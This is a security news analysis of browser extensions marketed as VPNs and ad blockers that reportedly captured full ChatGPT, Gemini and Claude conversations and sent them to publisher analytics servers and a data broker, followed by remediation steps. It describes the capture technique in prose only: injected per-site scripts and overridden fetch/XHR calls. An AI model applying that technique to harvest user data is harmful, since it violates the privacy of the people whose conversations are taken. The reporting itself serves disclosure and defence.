A family of popular browser extensions marketed as free VPNs and privacy tools secretly intercepted entire conversations with ChatGPT, Google Gemini, Anthropic Claude and several other AI chat services, then forwarded those chats to analytics servers and — according to researchers — to a data‑brokering affiliate, exposing well over eight million installs and creating one of the most consequential privacy incidents for consumer AI to date.
Security researchers at Koi Security discovered that multiple extensions published by the same developer added stealthy, platform‑specific “executor” scripts to capture every message and response exchanged with major web‑based AI assistants. The behavior was introduced via an automatic update and enabled by default in version 5.5.0 of the largest extension, meaning most users who had the extension installed were opted in without an explicit, contextual consent flow. The affected extensions include Urban VPN Proxy (the flagship listing with the largest install count), 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker across the Chrome Web Store and Microsoft Edge Add‑ons catalogue. Koi’s telemetry and follow‑up reporting show the combined install base exceeds eight million, with Urban VPN Proxy alone showing multi‑million installs on Chrome and more than a million on Edge. Koi’s technical write‑up — and multiple independent outlets reporting on it — detail how the extensions injected per‑platform JavaScript files (for example chatgpt.js, gemini.js, claude.js) into pages hosting AI chats, overrode core browser networking APIs, captured prompts, replies, conversation identifiers and timestamps, and then exfiltrated that data to remote analytics endpoints controlled by the publisher. Those endpoints are named in the research and reporting as analytics.urban‑vpn[.]com and stats.urban‑vpn[.]com. This is not a partial leak of metadata or a sampling pipeline — the researchers report full conversation capture (user prompts and model outputs), session metadata and model identifiers. That combination makes the incident especially damaging: it can expose personal health questions, financial disclosures, proprietary source code, internal corporate strategy and any secrets users treated as private in AI sessions.
Source: Neowin https://www.neowin.net/amp/maliciou...gemini-conversations-of-over-8-million-users/
Background / Overview
Security researchers at Koi Security discovered that multiple extensions published by the same developer added stealthy, platform‑specific “executor” scripts to capture every message and response exchanged with major web‑based AI assistants. The behavior was introduced via an automatic update and enabled by default in version 5.5.0 of the largest extension, meaning most users who had the extension installed were opted in without an explicit, contextual consent flow. The affected extensions include Urban VPN Proxy (the flagship listing with the largest install count), 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker across the Chrome Web Store and Microsoft Edge Add‑ons catalogue. Koi’s telemetry and follow‑up reporting show the combined install base exceeds eight million, with Urban VPN Proxy alone showing multi‑million installs on Chrome and more than a million on Edge. Koi’s technical write‑up — and multiple independent outlets reporting on it — detail how the extensions injected per‑platform JavaScript files (for example chatgpt.js, gemini.js, claude.js) into pages hosting AI chats, overrode core browser networking APIs, captured prompts, replies, conversation identifiers and timestamps, and then exfiltrated that data to remote analytics endpoints controlled by the publisher. Those endpoints are named in the research and reporting as analytics.urban‑vpn[.]com and stats.urban‑vpn[.]com. This is not a partial leak of metadata or a sampling pipeline — the researchers report full conversation capture (user prompts and model outputs), session metadata and model identifiers. That combination makes the incident especially damaging: it can expose personal health questions, financial disclosures, proprietary source code, internal corporate strategy and any secrets users treated as private in AI sessions. How the interception worked — technical breakdown
The executor script model
- The extensions contained dedicated executor scripts for each targeted AI service. These scripts were designed to detect when a user opened an AI chat page, inject a content script into that page, and hook page internals to harvest text before it left the browser or after it arrived from the server (depending on the platform's DOM and JavaScript architecture).
- Key browser APIs were overridden in page context — notably fetch and XMLHttpRequest — so that requests and responses passed through the extension’s code first. That allowed the extension to capture the raw prompt text and the model’s output before they were rendered or encrypted by the service’s own client logic.
What was collected
- Every user prompt (plain text).
- Full assistant responses (the model output).
- Conversation identifiers and timestamps.
- Session metadata that can include model or endpoint identifiers (e.g., which model was used or which tab initiated the session).
- Potentially other browsing state elements that make re‑identification easier (cookies, localStorage, or session IDs) depending on the extension’s permissions.
Exfiltration and downstream use
- Collected data was batched and shipped to analytics endpoints operated by the extension publisher. Koi’s report traces this pipeline and identifies downstream sharing with a data‑broker affiliate (reported under the BiScience / B.I. Science family in multiple follow‑ups), which markets clickstream and advertising‑intelligence products. Independent researchers have previously documented the same broker’s involvement in similar extension ecosystems.
- The extension’s privacy policy — where it mentions “AI inputs and outputs” — reads as a legal disclosure of the pipeline, but researchers note the wording is buried and the harvesting was enabled automatically by an update, with no clear opt‑out shown to end users. That design effectively circumvented any meaningful informed consent.
Scale, timing and affected platforms
- Primary timing: Researchers observed the harvesting behavior begin with a July 2025 update to the core extension (version 5.5.0), after which automatic updates propagated the new code to existing installs. Because Chrome and Edge auto‑update extensions by default, millions of profiles received the change without an explicit re‑approval step.
- Install counts reported by researchers and echoed in multiple outlets:
- Urban VPN Proxy: ~6,000,000 installs on Chrome Web Store and ~1,300,000 on Edge Add‑ons (aggregate counts vary slightly by source and timing).
- 1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker: hundreds of thousands to low‑six‑figure installs; combined, the family exceeds 8 million installs.
- Targeted AI platforms (platform coverage reported by researchers):
- ChatGPT (OpenAI)
- Gemini (Google)
- Claude (Anthropic)
- Microsoft Copilot
- Perplexity, xAI Grok and Meta AI
- Plus other web‑based assistants and aggregators whose front‑end DOM allowed script injection.
Vendor and platform responses (what’s known — and what isn’t)
- Multiple outlets repeated Koi Security’s findings within hours of disclosure and contacted platform vendors and store operators for comment. At the time the research was published, Google and Microsoft were notified and the extensions were flagged in public reporting, but official removal or takedown actions varied between stores and sources; public, attributed statements from Google or Microsoft confirming a full takedown were not widely published at the time of the reporting. That means the current store status for every affected listing required a live check — readers should not assume a universal or immediate removal. This point remains fluid and requires confirmation from the stores’ official dashboards.
- Important policy angle: Google’s developer and API user‑data rules explicitly prohibit the transfer or sale of user data to data brokers and require transparency about data uses. If the behavior described by Koi and corroborated by multiple outlets is accurate, it would run counter to those platform policies; that mismatch explains why researchers framed the incident not just as a privacy lapse but as an enforcement failure worth regulatory attention.
- Caveat about attribution and downstream buyers: Koi’s analysis links the extension publisher to a known data‑broker family in the ecosystem; independent reporting draws the same connection. However, precise buyer lists, purchase receipts or contractual terms for the harvested AI chats are not publicly disclosed in forensic detail. Statements that specific third parties purchased a given conversation dataset should be treated as probable but not fully independently verified unless documents or confirmed buyer acknowledgements are published. Researchers and reporters have flagged these chains of custody and shared supporting artifacts, but ultimate proof of who used specific conversation data is harder to establish publicly.
Why this is unusually dangerous
- Full conversation capture is high‑fidelity: Unlike metadata leaks that reveal only who chatted or that an exchange occurred, this pipeline reportedly captured the content — prompts and responses — which is where secrets live. Users routinely include medical, legal, financial and proprietary code in AI chats. That makes the data directly monetizable and immediately dangerous in downstream hands.
- Cross‑platform breadth increases exposure: Because the executor model fingerprinted and targeted many major AI web interfaces, a single infected profile could leak chats across several services — increasing the chance that a user’s most sensitive data was included.
- Auto‑update propagation is the multiplier: Browser extension auto‑update mechanisms are designed for security fixes and feature delivery. Here, they enabled a mass opt‑in for a new data collection behavior without a forced re‑consent step, multiplying the blast radius overnight. This is a well‑known supply‑chain risk in extension ecosystems.
Practical, prioritized actions for users (what to do right now)
If you use any browser extension that matches the affected family (Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker) — or if you have any add‑on you don’t recognise — take these steps immediately:- Uninstall the suspect extension(s) from every browser and profile on every device.
- Clear browser cookies and site data for AI sites you used while the extension was installed, and sign out of those services to force session invalidation.
- Revoke and rotate any credentials or API keys you may have pasted or shared in AI chats (for example, developer keys, tokens, or embedded secrets shown to an assistant).
- Change passwords for accounts mentioned in sensitive chats and enable multi‑factor authentication (MFA) where available.
- If you shared sensitive personal or health information, treat the leakage as a data breach: monitor accounts, place fraud alerts if appropriate, and follow institutional incident response if it involves work data.
- Consider deleting or limiting retained chat history inside the AI service and use the vendor’s data controls to opt out of training or long‑term retention where available. For consumer ChatGPT and Google Gemini, data‑control toggles and history deletion options exist; disable “Improve the model” or “Gemini Apps Activity” and delete retained activity as documented in vendor guidance.
What IT teams and enterprise administrators must do
- Immediately publish an advisory to employees and contractors to audit and remove the listed extensions from corporate devices. Assume that any staff who used AI chat tools in a browser profile with the extension present had those chats observed.
- Use enterprise extension controls to block or allow extensions centrally:
- Chrome Enterprise and Microsoft Intune / Group Policy let admins block specific extension IDs or force‑install only whitelisted extensions. Use these controls to block the Urban family extension IDs and any other suspect IDs.
- For Microsoft Edge, use ExtensionInstallBlocklist and ExtensionInstallAllowlist policies to prevent re‑installation on managed machines.
- Rotate and revoke any company secrets that may have been copied into AI chats, and treat the incident like a compromise: conduct a rapid scope analysis to identify users who had both the extension installed and who shared high‑value data with AI assistants. Consider legal notification obligations depending on sector and jurisdiction.
- Revisit policies for AI use in the company: disallow pasting production credentials into public or consumer AI chat windows; prefer managed enterprise LLM services with contractual data controls; and centralise AI usage to vetted clients or browser profiles with strict extension rules.
Regulatory and policy implications
- Under platform rules: Google’s developer and user‑data policies forbid transferring or selling user data to data brokers except under narrow, disclosed exceptions. If corroborated, the reported extension behavior would represent a stark breach of Chrome Web Store policy and the spirit of limited‑use requirements. Platform enforcement — and whether the stores apply penalties beyond takedown (developer account suspension, refunds, or permanent bans) — is a separate but important question.
- Under privacy law: Selling or sharing raw chat contents containing personal data can trigger obligations under GDPR, CCPA and other data‑protection regimes (notifications, breach reporting, potential fines), especially if the data is identifiable or linked to other identifiers. Enterprises should assume regulated data may be implicated and consult legal counsel. Public authorities and regulators typically treat exfiltration of sensitive telemetry — including health or financial data — as a serious compliance incident.
- For store policy reform: This incident highlights weaknesses in extension review processes that rely on developer self‑disclosure. Better automated static and dynamic analysis of extension packaging, stricter enforcement of Limited Use clauses, clearer user‑facing consent and a requirement for a forced re‑consent screening after behavioral changes would reduce the likelihood of mass, silent opt‑ins. Several researchers have argued for stronger policy enforcement and technical controls for high‑privilege extension permissions; the current event strengthens that case.
Strengths and limitations of the public evidence
- Strengths:
- Multiple independent security outlets and researchers replicated core technical observations: per‑platform executor scripts, overridden fetch/XHR APIs, exfil endpoints and aggregated install counts. That reproducibility adds credibility to the central claims.
- The pattern (free extension marketed for privacy, update that enables broad telemetry, downstream sale to brokers) mirrors earlier, documented extension‑ecosystem abuses — meaning this is a recurring, empirically supported business model, not a one‑off scare.
- Limitations and cautions:
- Public reporting names analytics endpoints and an affiliated broker, but direct evidence of which third‑party clients purchased specific conversation logs is indirect; tracing buyers of harvested content in opaque data markets is difficult. These downstream commercial flows should be treated as likely and consistent with past patterns but not as fully proven until contractual receipts or buyer confirmations are shown.
- The exact number of actively compromised profiles that had the malicious update applied and actually exfiltrated chats is inherently fuzzy. Store install counts are a coarse proxy — they include inactive installs, synced devices, and profiles that may never have visited an AI site — so “eight million installs” denotes reach, not an exact headcount of exfiltrated conversations. Researchers and reporters note this nuance.
Broader takeaways: why AI privacy needs a new threat model
This incident reframes two core assumptions in consumer AI security:- First, client‑side software (extensions, plug‑ins and browser helpers) can be the weakest link. Users often install privacy tools imagining they improve safety; here those tools betrayed that trust by capturing the most private content a user can produce: their unstructured conversations with assistants. Extension ecosystems must be treated as potential mass‑surveillance vectors rather than benign convenience layers.
- Second, end‑to‑end encryption of a service does not protect content that never reaches the encrypted channel in its intended form: if a script captures the plaintext in the browser before encryption or after decryption, the service’s transport security is irrelevant. Threat models for AI must include browser‑context attacks and extension privilege abuse.
Final verdict and recommendations
The Koi Security disclosure and corroborating reporting paint a persuasive and worrying picture: a set of high‑install browser extensions used widely for “privacy” and ad blocking harvested full AI conversations and pushed them into analytics pipelines that likely flowed into the commercial clickstream market. The core technical mechanisms — per‑site executor scripts, API hooking, and background exfiltration — are straightforward and well within the capabilities of a browser extension with broad permissions. Multiple independent outlets reproduced Koi’s high‑level findings, strengthening the case. What remains uncertain are the precise details of downstream purchasers and the full legal exposure for the publisher and any buyers; those are matters for forensic disclosure, regulator inquiries, and — potentially — litigation. Until such authoritative disclosures appear, treat any specific claims about exactly who bought which chats as plausible but not incontrovertibly proven. For WindowsForum readers and IT professionals, the immediate action is simple and urgent: audit installed extensions, uninstall anything suspicious (starting with the named Urban family extensions), rotate secrets, and treat any sensitive AI chat conducted in compromised profiles as exposed. For administrators: apply extension allowlists, force blocklists where necessary, and treat browser extension management as a first‑class endpoint security control. This episode will be a test case for platform enforcement, privacy law certainty, and the industry’s ability to harden browser extension ecosystems against monetization models built on secretly commoditized human conversations. The combination of AI convenience and browser extension privilege has created a new attack surface; addressing it will require technical fixes, policy enforcement and, most importantly, better user expectations and disclosure practices from store operators and extension publishers.Source: Neowin https://www.neowin.net/amp/maliciou...gemini-conversations-of-over-8-million-users/
